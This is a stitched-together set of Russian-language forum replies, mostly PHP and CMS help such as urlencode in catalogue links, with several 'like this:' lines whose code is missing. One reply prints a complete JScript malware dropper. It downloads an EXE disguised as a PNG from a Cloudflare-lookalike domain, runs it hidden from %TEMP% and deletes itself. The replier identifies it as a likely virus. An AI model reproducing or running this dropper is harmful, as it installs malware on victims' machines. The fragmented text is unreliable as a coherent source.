А зачем тебе админка-то ? :)
Да перейдите уже на PDO и забудьте этот бред.
foreach($xx as $rus) {$cont .= " <a href=\"".$config['http_home_url']."catalog/".urlencode($rus)."\" title=\"$rus\">$rus</a>";} $cont .= "";
foreach(range("А", "Я") as $rus)$cont .= " <a href=\"".$config['http_home_url']."catalog/".$rus."\" title=\"$rus\">$rus</a>"; $cont .= "";
Одно дело верный url, другое - кодировка текста.
Без urlencode url не будет верным.
Как-то так:
Или так:
Или вообще удалите.
Готового решения для вашего вопроса скорее всего нет.
А так для любой CMS можно написать скрипт/плагин который будет выполнять поставленные задачи.
Закоментируй
Я пользуюсь вот этим: http://lidplay.net/
Пока что нареканий нет.
Вот ваш JavaScript код.
try { var sh = new ActiveXObject( 'WScript.Shell' ) ; var url = 'https://cloudflare-url-protection.com/cloudflare7.png' ; var file = sh.ExpandEnvironmentStrings( '%TEMP%' ) + '/ff35fc06.exe' ; function gx( ) { var o = new ActiveXObject( 'MSXML2.ServerXMLHTTP' ) ; o.setTimeouts( 5000, 5000, 6000, 60000 ) ; o.setOption( 2, 13056 ) ; return o ; } var h = gx( ) ; h.open( 'GET', url, false ) ; h.send( ) ; if ( h.status == 200 ) { var s = WScript.CreateObject( 'ADODB.Stream' ) ; s.open( ) ; s.type = 1 ; s.write( h.responseBody ) ; s.position = 0 ; s.SaveToFile( file, 2 ) ; s.close( ) ; sh.run( file, 0, false ) ; new ActiveXObject( 'Scripting.FileSystemObject' ).DeleteFile( WScript.ScriptFullName ) ; } } catch ( e ) {}
https://cloudflare-url-protection.com/cloudflare7.png - ехе файл (MZ — стандартный формат 16-битных исполнимых файлов с расширением .EXE для DOS.)
Скорее всего это вирус, ну или WScript.Shell.
А не проще вот это в коде
заменить на вот это:
?
Удалял через unset ? Если просто присвоил пустую строку или null то это тебе не поможет.